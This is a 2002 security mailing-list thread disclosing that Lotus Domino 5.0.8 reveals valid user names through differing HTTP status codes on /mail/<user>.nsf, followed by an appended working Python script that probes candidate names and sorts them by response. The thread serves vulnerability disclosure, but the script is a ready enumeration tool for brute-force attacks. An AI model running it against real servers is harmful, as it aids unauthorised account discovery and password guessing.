From: OBrien, Brennan (BOBrien@columbia.com)
Date: Wed Jan 30 2002 - 11:04:18 CST
Sure do. Excellent tool for enumeration. Same holds true for OWA for
exchange. This gives me the ability, over time, to guess out how the
usernames are formed, and provides me with an externally available tool
for initial password guessing.
-----Original Message-----
From: nicob@nicob.net [mailto:nicob@nicob.net]
Sent: Wednesday, January 30, 2002 8:55 AM
To: vuln-dev@securityfocus.com
Subject: Enumerating users on a Domino webserver
Hi,
during a pen-test against a Domino 5.0.8 webserver, I was able to enumerate valid users.

A simple "GET /mail/toto.nsf HTTP/1.0" redirects to the login page (with a "200 OK" HTTP code) if the user "toto" exists, and a "404 File not Found" is returned if the user doesn't exist.

This issue can allow a faster brute force attack on HTTP passwords.

I have searched the Net for more information about this problem, but I found nothing.

Can the readers reproduce this behaviour?
Do you see other implications than user enumeration (for social engineering and brute force attacks)?
Nicob
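The check nicob describes, as an added example that is not part of the original thread: a small Python probe that builds /mail/<user>.nsf for each candidate name, keeps only the HTTP status code, and buckets 200 as "exists", 404 as "absent" and anything else (401, 403, 5xx, or a 3xx from a server that redirects rather than serving the login page inline) as "unknown", so that an ACL denial or a WAF page is not misread as a valid user. The host name, the candidate list and the fake Domino responder are constructed so the script runs offline; the real `http_status` fetcher is what you would pass in against a target you are engaged to test.

```python
"""Probe a Lotus Domino web server for valid mail users via the
/mail/<user>.nsf status-code oracle described in the post above.

Added example, not code from the original thread. Assumptions: mail
databases live under /mail/ and are named after the user (toto.nsf),
exactly as in the post; the server answers 200 (login page) for an
existing database and 404 for a missing one. Every other status is
reported as "unknown" rather than guessed at.
"""
import http.client
import re
from typing import Callable, Dict, Iterable, List

# Only plain names are probed; anything else could be a path trick, not a user.
_SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")


def mail_db_path(username: str) -> str:
    """Build the Domino mail database path for a candidate user name."""
    if not _SAFE_NAME.match(username) or ".." in username:
        raise ValueError(f"refusing to probe unsafe candidate name: {username!r}")
    return f"/mail/{username}.nsf"


def classify(status: int) -> str:
    """Map an HTTP status code to an enumeration verdict.

    200 -> the database exists (Domino served its login page)
    404 -> no such database, so the user does not exist
    anything else -> inconclusive (ACL denial, redirect, error page, WAF)
    """
    if status == 200:
        return "exists"
    if status == 404:
        return "absent"
    return "unknown"


def http_status(host: str, path: str, port: int = 80, timeout: float = 5.0) -> int:
    """Real fetcher: one GET, return only the status code, never the body."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path, headers={"User-Agent": "domino-enum-check"})
        return conn.getresponse().status
    finally:
        conn.close()


def enumerate_users(host: str, candidates: Iterable[str],
                    fetch: Callable[[str, str], int] = http_status) -> Dict[str, List[str]]:
    """Probe each candidate and bucket it by verdict.

    `fetch(host, path)` must return the status code; it is injectable so
    the bucketing logic can be exercised against a fake server offline.
    """
    verdicts: Dict[str, List[str]] = {"exists": [], "absent": [], "unknown": []}
    for name in candidates:
        status = fetch(host, mail_db_path(name))
        verdicts[classify(status)].append(name)
    return verdicts


# Constructed stand-in for a Domino 5.0.8 server so the script runs offline.
_FAKE_DOMINO_USERS = {"toto", "jsmith"}


def fake_domino(host: str, path: str) -> int:
    """Constructed responder: 200 for known mail files, 404 otherwise,
    and 403 for 'admin' to show an inconclusive answer being set aside."""
    m = re.fullmatch(r"/mail/([^/]+)\.nsf", path)
    if m is None:
        return 404
    if m.group(1) == "admin":
        return 403
    return 200 if m.group(1) in _FAKE_DOMINO_USERS else 404


if __name__ == "__main__":
    result = enumerate_users("domino.example.test",
                             ["toto", "jsmith", "admin", "nobody"],
                             fetch=fake_domino)
    for verdict, names in result.items():
        print(f"{verdict:8s} {', '.join(names) or '-'}")
```

The "unknown" bucket is the part worth keeping when you adapt this: a server that answers 403 or a 302 to a login form for every name gives no oracle at all, and silently folding those into "exists" is how a wordlist run ends up full of false positives.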